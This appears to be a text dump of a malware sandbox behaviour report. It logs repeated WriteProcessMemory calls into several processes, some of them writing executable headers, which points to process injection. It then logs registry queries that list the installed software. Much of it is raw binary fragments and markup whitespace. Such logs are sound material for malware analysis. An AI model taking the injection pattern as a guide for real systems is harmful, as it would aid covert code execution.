          0x000000013f2c0d88
        
      
      
      

    
  
    
      process_identifier:
      
        
          2580
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          I»`#(?Aÿã
        
      
      
      

    
  
    
      base_address:
      
        
          0x0000000076d81590
        
      
      
      

    
  
    
      process_identifier:
      
        
          2580
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000000000000050
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          /
        
      
      
      

    
  
    
      base_address:
      
        
          0x000000013f2c0d78
        
      
      
      

    
  
    
      process_identifier:
      
        
          2580
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          I»  (?Aÿã
        
      
      
      

    
  
    
      base_address:
      
        
          0x0000000076d57a90
        
      
      
      

    
  
    
      process_identifier:
      
        
          2580
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000000000000050
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          /
        
      
      
      

    
  
    
      base_address:
      
        
          0x000000013f2c0d70
        
      
      
      

    
  
    
      process_identifier:
      
        
          2580
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          ϝT
        
      
      
      

    
  
    
      base_address:
      
        
          0x000000013f260108
        
      
      
      

    
  
    
      process_identifier:
      
        
          2580
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          Øv@Øv Øv@ØvØv°Øv €ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀ‚ÖvöÔv YØv2ØvVØv°Þv€“Õv€RØv ›ÕvQØvÂÕv ?ÖvP€Õv°TÕvàtÕvð„ÖvÐ1Øv™ÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv
        
      
      
      

    
  
    
      base_address:
      
        
          0x000000013f2baae8
        
      
      
      

    
  
    
      process_identifier:
      
        
          2580
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          
        
      
      
      

    
  
    
      base_address:
      
        
          0x000000013f2c0c78
        
      
      
      

    
  
    
      process_identifier:
      
        
          2580
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          
        
      
      
      

    
  
    
      base_address:
      
        
          0x000000013f2b22b0
        
      
      
      

    
  
    
      process_identifier:
      
        
          2964
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          
        
      
      
      

    
  
    
      base_address:
      
        
          0x000000013f2c0d88
        
      
      
      

    
  
    
      process_identifier:
      
        
          2964
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          I»`#(?Aÿã
        
      
      
      

    
  
    
      base_address:
      
        
          0x0000000076d81590
        
      
      
      

    
  
    
      process_identifier:
      
        
          2964
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000000000000050
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          ?	
        
      
      
      

    
  
    
      base_address:
      
        
          0x000000013f2c0d78
        
      
      
      

    
  
    
      process_identifier:
      
        
          2964
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          I»  (?Aÿã
        
      
      
      

    
  
    
      base_address:
      
        
          0x0000000076d57a90
        
      
      
      

    
  
    
      process_identifier:
      
        
          2964
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000000000000050
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          ?	
        
      
      
      

    
  
    
      base_address:
      
        
          0x000000013f2c0d70
        
      
      
      

    
  
    
      process_identifier:
      
        
          2964
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          ϝT
        
      
      
      

    
  
    
      base_address:
      
        
          0x000000013f260108
        
      
      
      

    
  
    
      process_identifier:
      
        
          2964
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          Øv@Øv Øv@ØvØv°Øv €ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀ‚ÖvöÔv YØv2ØvVØv°Þv€“Õv€RØv ›ÕvQØvÂÕv ?ÖvP€Õv°TÕvàtÕvð„ÖvÐ1Øv™ÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv
        
      
      
      

    
  
    
      base_address:
      
        
          0x000000013f2baae8
        
      
      
      

    
  
    
      process_identifier:
      
        
          2964
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          
        
      
      
      

    
  
    
      base_address:
      
        
          0x000000013f2c0c78
        
      
      
      

    
  
    
      process_identifier:
      
        
          2964
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          MZx@xº´	Í!¸LÍ!This program cannot be run in DOS mode.$PELS4¬eàØ n@ @ƒkP0(ëlD.text¾ `.rdata\=0>@@.data0¾p®X@À.reloc(ë0ì@B
        
      
      
      

    
  
    
      base_address:
      
        
          0x00400000
        
      
      
      

    
  
    
      process_identifier:
      
        
          4192
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000029c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          @
        
      
      
      

    
  
    
      base_address:
      
        
          0xfffde008
        
      
      
      

    
  
    
      process_identifier:
      
        
          4192
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000029c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          MZÿÿ¸@€º´	Í!¸LÍ!This program cannot be run in DOS mode.

$PEL¸éïà0äÌŽ  @  @…@K ÀÉ  H.text”â ä `.rsrcÀÉ Êæ@@.reloc°@B
        
      
      
      

    
  
    
      base_address:
      
        
          0x00400000
        
      
      
      

    
  
    
      process_identifier:
      
        
          5088
        
      
      
      

    
  
    
      process_handle:
      
        
          0x00000228
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          2
        
      
      
      

    
  
    
      base_address:
      
        
          0x00450000
        
      
      
      

    
  
    
      process_identifier:
      
        
          5088
        
      
      
      

    
  
    
      process_handle:
      
        
          0x00000228
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          @
        
      
      
      

    
  
    
      base_address:
      
        
          0x7efde008
        
      
      
      

    
  
    
      process_identifier:
      
        
          5088
        
      
      
      

    
  
    
      process_handle:
      
        
          0x00000228
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    

                                    
                                        

                                            Time & API
                                            Arguments
                                            Status
                                            Return
                                            Repeated
                                        

                                    

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          MZx@xº´	Í!¸LÍ!This program cannot be run in DOS mode.$PELS4¬eàØ n@ @ƒkP0(ëlD.text¾ `.rdata\=0>@@.data0¾p®X@À.reloc(ë0ì@B
        
      
      
      

    
  
    
      base_address:
      
        
          0x00400000
        
      
      
      

    
  
    
      process_identifier:
      
        
          4192
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000029c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          MZÿÿ¸@€º´	Í!¸LÍ!This program cannot be run in DOS mode.

$PEL¸éïà0äÌŽ  @  @…@K ÀÉ  H.text”â ä `.rsrcÀÉ Êæ@@.reloc°@B
        
      
      
      

    
  
    
      base_address:
      
        
          0x00400000
        
      
      
      

    
  
    
      process_identifier:
      
        
          5088
        
      
      
      

    
  
    
      process_handle:
      
        
          0x00000228
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    

                                    
                                        

                                            Time & API
                                            Arguments
                                            Status
                                            Return
                                            Repeated
                                        

                                    

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          EditPlus
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x0000047c
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Enterprise 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x0000047c
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Chrome
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x0000047c
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          ????? ?? 2010
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          HttpWatch Professional 9.3.39
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x0000047c
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          ????? ?? 2010
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000484
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Google Update Helper
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000484
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Access MUI (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000484
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Excel MUI (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000484
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office PowerPoint MUI (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Publisher MUI (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Outlook MUI (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x0000047c
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Word MUI (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Proof (English) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x0000047c
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Proof (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office IME (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Proofing (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Enterprise 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office InfoPath MUI (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Shared MUI (English) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Shared MUI (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office OneNote MUI (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Groove MUI (English) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Groove Setup Metadata MUI (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Adobe Flash Player 13 ActiveX
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Adobe Flash Player 13 NPAPI
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExA

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000588
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          EditPlus
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000588
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Enterprise 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000594
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Chrome
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
        
      
      
      

    
  


    
        1
    

0
